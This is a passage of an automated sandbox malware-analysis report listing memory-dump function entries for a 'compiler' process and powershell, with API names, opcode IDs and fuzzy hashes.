                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _handle_error_raise_exc
                                                            • String ID: !$sin
                                                            • API String ID: 1935476177-1565623160
                                                            • Opcode ID: 8df25b79fe6bb5d636ce5aab3a5d99b74cd068bdb20b50b3a7ddf8ff0cc9fedd
                                                            • Instruction ID: f13c341aab3c22f6943a3551b4e62f6651af533fb8ccc32d5b6fc34caf227644
                                                            • Opcode Fuzzy Hash: 8df25b79fe6bb5d636ce5aab3a5d99b74cd068bdb20b50b3a7ddf8ff0cc9fedd
                                                            • Instruction Fuzzy Hash: 4C019671A18B8582EA54EF16A40037AA561FBAABD4F904334FE9D17B9CEF7CD1408B00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBDCB8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _handle_error_raise_exc
                                                            • String ID: !$cos
                                                            • API String ID: 1935476177-1949035351
                                                            • Opcode ID: 8e42d1cbe5100210f0b3884798fa4b23dd32e4648c13ae4810f3e993030f723a
                                                            • Instruction ID: b44dddbed23906aaa98013f0ffb46b41ca259acafe8c59ea306f14a22a852a5c
                                                            • Opcode Fuzzy Hash: 8e42d1cbe5100210f0b3884798fa4b23dd32e4648c13ae4810f3e993030f723a
                                                            • Instruction Fuzzy Hash: 3801B571A18B8542EA14EF169400376A161FFABBD4F904334FE9906B9CEF7CD1415700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBDD84 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _handle_error_raise_exc
                                                            • String ID: !$tan
                                                            • API String ID: 1935476177-2428968949
                                                            • Opcode ID: 935e24b105acfd60860e97405ccf4e5002346eae3c521358fcdcccb835f8744f
                                                            • Instruction ID: 209748fe80311d342bf3d9f2d84694766a74cdcd38d6079279f3e3568bc1a028
                                                            • Opcode Fuzzy Hash: 935e24b105acfd60860e97405ccf4e5002346eae3c521358fcdcccb835f8744f
                                                            • Instruction Fuzzy Hash: DC01B171A18B8582EA14EF16940037AA161FFAABD4F904335FE9D07B9CEF7DD0808B00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBD660 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: "$exp
                                                            • API String ID: 1757819995-2878093337
                                                            • Opcode ID: e928720596b9d94672a02348a76923f70d207e578a94a6fc764d589324dc71b7
                                                            • Instruction ID: e298bf2f11430d4f3149a45c2be7c71ce7de87de3a4270fc53d7f7f5e210341c
                                                            • Opcode Fuzzy Hash: e928720596b9d94672a02348a76923f70d207e578a94a6fc764d589324dc71b7
                                                            • Instruction Fuzzy Hash: 2E018C76929B8887F620EF24D4452AAB660FFEB704FA41325FB8416664CB7DD485DF00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB7EC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: DefaultUsertry_get_function
                                                            • String ID: GetUserDefaultLocaleName
                                                            • API String ID: 3217810228-151340334
                                                            • Opcode ID: 03411ff9c2691ac1922605afe54f956f17eda239d58754208771313afc30d5dc
                                                            • Instruction ID: 7084727c298ed6c27b3e5b48b5e5bd6903eb164d0af8481df45893c668a42286
                                                            • Opcode Fuzzy Hash: 03411ff9c2691ac1922605afe54f956f17eda239d58754208771313afc30d5dc
                                                            • Instruction Fuzzy Hash: A7F0E250B0A64262FB057B6DA5805B8D261EFAE780FC880B5FF0D06BADDE2CE4448360
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB7F2C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB7F5D
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF7BADBBDAA,?,?,?,00007FF7BADBBCA2,?,?,?,00007FF7BADA9D09), ref: 00007FF7BADB7F77
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 539475747-3084827643
                                                            • Opcode ID: eefd55364696c6910bdfdda8fd7c70efa449914f634fb1272f63a95235c7ae12
                                                            • Instruction ID: ea9c984ae1381c3fa1766ab29586912d2a6e1c715e39cd429fb39143ecb3d1d3
                                                            • Opcode Fuzzy Hash: eefd55364696c6910bdfdda8fd7c70efa449914f634fb1272f63a95235c7ae12
                                                            • Instruction Fuzzy Hash: A6F05E25A1978592FB04BB59E4404B5A320EF5AB80FC885B9EF9D03B5CDE3CE455C760
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB7C44 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB7C6D
                                                            • TlsSetValue.KERNEL32(?,?,?,00007FF7BADB92BE,?,?,?,00007FF7BADA9B4D,?,?,?,?,00007FF7BADBE8F3), ref: 00007FF7BADB7C84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: Valuetry_get_function
                                                            • String ID: FlsSetValue
                                                            • API String ID: 738293619-3750699315
                                                            • Opcode ID: 06c61580f9840f15817015c19dca4b045d456ef0908e53a19be99ee32c966495
                                                            • Instruction ID: 627dc6773a61672cdd77626eafd1218717ec9ba66ec992adb900f14026e53de8
                                                            • Opcode Fuzzy Hash: 06c61580f9840f15817015c19dca4b045d456ef0908e53a19be99ee32c966495
                                                            • Instruction Fuzzy Hash: 5CE065A1A0E64292FA047B58E4040B9A321EF59780FD880F5EF4D0636CDE3CE458C260
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD8DD1C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BAD8DD45
                                                            • TlsSetValue.KERNEL32(?,?,?,00007FF7BAD8D91D,?,?,?,?,00007FF7BAD8D790,?,?,?,?,00007FF7BAD8C153), ref: 00007FF7BAD8DD5C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: Valuetry_get_function
                                                            • String ID: FlsSetValue
                                                            • API String ID: 738293619-3750699315
                                                            • Opcode ID: 09468e8d03e82d1305376de481b1338bf56d9ddb3db22b698813e028a0dee6dd
                                                            • Instruction ID: c6067a760f1c7112e7ed59e02d33096c6e36a4a355582f825b1be8078caeb9b9
                                                            • Opcode Fuzzy Hash: 09468e8d03e82d1305376de481b1338bf56d9ddb3db22b698813e028a0dee6dd
                                                            • Instruction Fuzzy Hash: 6AE065B5A0864282FA047B58F4081B4A321EF69B80FD94075DF9D0739CCE3CE555C270
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB8134 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: DownlevelLocaleName__crttry_get_function
                                                            • String ID: LocaleNameToLCID
                                                            • API String ID: 404522899-2050040251
                                                            • Opcode ID: d756f7f956f81b3b3dd7577028f241a48aafa3ad52789f0d3d8db9e85b72364b
                                                            • Instruction ID: 85876aeb68a2d53366641d4bb069f9d44d053c91859124a667233742468c8de5
                                                            • Opcode Fuzzy Hash: d756f7f956f81b3b3dd7577028f241a48aafa3ad52789f0d3d8db9e85b72364b
                                                            • Instruction Fuzzy Hash: 46E0E564E0964292FB04BB18E4000B8A210DF6A380FD881B5EF6D0635DEE3CE944C260
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Executed Functions

                                                            Function 00007FFD9B3DCC95 Relevance: .7, Instructions: 722COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a36415434ada177da4bfd51bc9d691eeff6cdb2f3a4715ce26afb9fb289a322d
                                                            • Instruction ID: 901356a7dd21ff05b80abdb16abab9b7819801088d6651adfc6ceca7eb684324
                                                            • Opcode Fuzzy Hash: a36415434ada177da4bfd51bc9d691eeff6cdb2f3a4715ce26afb9fb289a322d
                                                            • Instruction Fuzzy Hash: 3D32C630A18A4D8FDB98EF5CC4A5AA977E1FF99310F14027DD449C7296CA35F842CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B4A45CB Relevance: .5, Instructions: 530COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2566535279.00007FFD9B4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b4a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 79c898634555427d126ea6dd3cdb717bffa7771ae2a2521c277754591c1f140c
                                                            • Instruction ID: ab01027036ddc27f1a469e73f4ba543d24e73001430df1e18709fa9a17d779b1
                                                            • Opcode Fuzzy Hash: 79c898634555427d126ea6dd3cdb717bffa7771ae2a2521c277754591c1f140c
                                                            • Instruction Fuzzy Hash: DEE10762A0FBC90FE766877858655A87FE0EF57614B0A01FFD099CB0E3D9086D06D392
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B3DDD75 Relevance: .5, Instructions: 482COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9cb3bfc63a26140457761a5e7b8b26787ac2593fe493d75fb603a6759c7ca779
                                                            • Instruction ID: e8eceae73974472e7a19c30e233c011f79f0f2d8ce9f43eaa9b0227d810a35b0
                                                            • Opcode Fuzzy Hash: 9cb3bfc63a26140457761a5e7b8b26787ac2593fe493d75fb603a6759c7ca779
                                                            • Instruction Fuzzy Hash: 17E1B530A09A4D8FDF98EF5CC455AA97BE1FFA8310F1542AAD409D7296CA35EC41C781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B3D6B31 Relevance: .4, Instructions: 385COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e298a5cf0b176762eb33a7a2c799f7e37236dc175ab3faa9cd6ebe14fc53ebb
                                                            • Instruction ID: 3491fe631f7c4449ca534aed5a993e5cd0ba171f1ea658e57080a36b39172479
                                                            • Opcode Fuzzy Hash: 6e298a5cf0b176762eb33a7a2c799f7e37236dc175ab3faa9cd6ebe14fc53ebb
                                                            • Instruction Fuzzy Hash: D8C19130A19A4D8FDF94EF9CC451AA9BBF1FFA8300F15426AD41DD7295CA35E881CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B3D67BC Relevance: .3, Instructions: 336COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a4046eecbd740b2e070b493f2132791cdbf256168ec708fc9b37e82f879cb545
                                                            • Instruction ID: ad4a0b1f931ffc3acb6536b1cd26057f4567c8bdcfeabaaaf9dbc727f928bce3
                                                            • Opcode Fuzzy Hash: a4046eecbd740b2e070b493f2132791cdbf256168ec708fc9b37e82f879cb545
                                                            • Instruction Fuzzy Hash: 24B14031A1894D8FDF98EF9CC455AADB7E1FFA8300F15826AD41DD7295CA35E881CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B4A438C Relevance: .3, Instructions: 287COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2566535279.00007FFD9B4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b4a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bcb1602aa51b0a7ef82d4607cda9ba25033aee0b9f0ef6bb802dcfffc892894d
                                                            • Instruction ID: 37b108207a0ea77b88ddcb2c36a4d181ddc0966191dcb74824200477d9103272
                                                            • Opcode Fuzzy Hash: bcb1602aa51b0a7ef82d4607cda9ba25033aee0b9f0ef6bb802dcfffc892894d
                                                            • Instruction Fuzzy Hash: A4815A22B0EA8D0FE7A99A6C48751793BD1EF95224B0A01FFD15DC71E3DE18AC05D381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B3DADE8 Relevance: .3, Instructions: 256COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2572f636d38a2fdb9647f1838214ab067e41cdb858a0acc7721822d06968b706
                                                            • Instruction ID: cb80a445412c9ec8aed8792e5557ffcc9e27c7c7650a507128bd9b576e370233
                                                            • Opcode Fuzzy Hash: 2572f636d38a2fdb9647f1838214ab067e41cdb858a0acc7721822d06968b706
                                                            • Instruction Fuzzy Hash: B6816B7161E7C94FD716EB6CDCA15A47BA0FF52324B0802FED089CB1A3EA296846C751
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B3DA068 Relevance: .2, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8625862c8f394e1db9970f6cc24c0062d54149d63db1c69af7ebbdb19a43e3eb
                                                            • Instruction ID: 95f1688821be76c3c7baa88b5e9eb3e99653f83ef2dce0b5458c9ed9aba85900
                                                            • Opcode Fuzzy Hash: 8625862c8f394e1db9970f6cc24c0062d54149d63db1c69af7ebbdb19a43e3eb
                                                            • Instruction Fuzzy Hash: 1151F772D1F68E8FE716EB6858764D07FA0FF52224B0902FBC5988F0A3FD2925568345
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B4A56A2 Relevance: .2, Instructions: 167COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2566535279.00007FFD9B4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b4a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c2b427018795961e7d34db26ed9e8367cb24c459af069970c9dee852a225f94
                                                            • Instruction ID: 3f7785650a848a6d73c53c72130beb3579e0b4aa162015f3097e7aa5ca5d4ed9
                                                            • Opcode Fuzzy Hash: 0c2b427018795961e7d34db26ed9e8367cb24c459af069970c9dee852a225f94
                                                            • Instruction Fuzzy Hash: 3441482170EB894FE7599B6C5865675BBE0EF9A318F0901FFD088C71E3D919AD40C382
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B3DA998 Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9464cf7baffde10d94a1510a18182c3a1812b44c235925c4e83272b6a4275df8
                                                            • Instruction ID: 3db31bdb273043d3326c94fd38297febbd7098c0448fc2db558b04582f1e8134
                                                            • Opcode Fuzzy Hash: 9464cf7baffde10d94a1510a18182c3a1812b44c235925c4e83272b6a4275df8
                                                            • Instruction Fuzzy Hash: 1041E63191CB4C4FDB1CDB5CA84A7E97BE0EB95321F04426FD049C3692CB75A456CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B2BEB89 Relevance: .1, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2564176674.00007FFD9B2BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b2bd000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8b6bc8fb5117645ce6ff9109d03221fc9ce18d3c9b209353cc9099a2aa452189
                                                            • Instruction ID: 24f756c9bfea15eec1efdbf86b99ca62a6d90d01d3aed5dea42606dad28f4b01
                                                            • Opcode Fuzzy Hash: 8b6bc8fb5117645ce6ff9109d03221fc9ce18d3c9b209353cc9099a2aa452189
                                                            • Instruction Fuzzy Hash: EF413A7140EBC84FE7969B2898519623FF0EF53320B1605DFD089CF1A7DA25A806C792
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B3D99BF Relevance: .1, Instructions: 109COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7ed8f4fac35f43efc1dc7f3e6c73028e56541b6f5509fc9c5412ff1ebb137ae0
                                                            • Instruction ID: 5e05491813d1d13b0f2e1aa2fddcf3edf26fc4f706ce8bcc9d3e25e733c497c1
                                                            • Opcode Fuzzy Hash: 7ed8f4fac35f43efc1dc7f3e6c73028e56541b6f5509fc9c5412ff1ebb137ae0
                                                            • Instruction Fuzzy Hash: 2931843191CB4C9FDB1CDB5CA84AAA97BE0FB99721F00422FE449D3251CB71A855CBC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B3DDDBC Relevance: .1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4982b8ed47bcb975f3f75f4144b20ba31d7489b7c5f1db3897448e558ae82ac2
                                                            • Instruction ID: 8a74d94bfc7a7b9553b67a21ad7c2cc4e1bfe8925db62dc553e65872a2fa6cd8
                                                            • Opcode Fuzzy Hash: 4982b8ed47bcb975f3f75f4144b20ba31d7489b7c5f1db3897448e558ae82ac2
                                                            • Instruction Fuzzy Hash: ED21F13170DA0C4FEB5CEA1CD899AB577D1EBA9310B1002AEE449C7292DD66FC82C781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B3DA8C8 Relevance: .1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e2f6ceb1c94a67d44f08566558a72452013ebbdd2e08fc3f9d58ce676384f9ce
                                                            • Instruction ID: e312a43ff105392400854cff1b255be608b51ef4b42ca967b6291f7990d9cbd1
                                                            • Opcode Fuzzy Hash: e2f6ceb1c94a67d44f08566558a72452013ebbdd2e08fc3f9d58ce676384f9ce
                                                            • Instruction Fuzzy Hash: C7210731A1CA4C8FDB58DB9C984A7E97FE0EB96321F04426FD448C3162DA75A416CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B4A443F Relevance: .1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2566535279.00007FFD9B4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
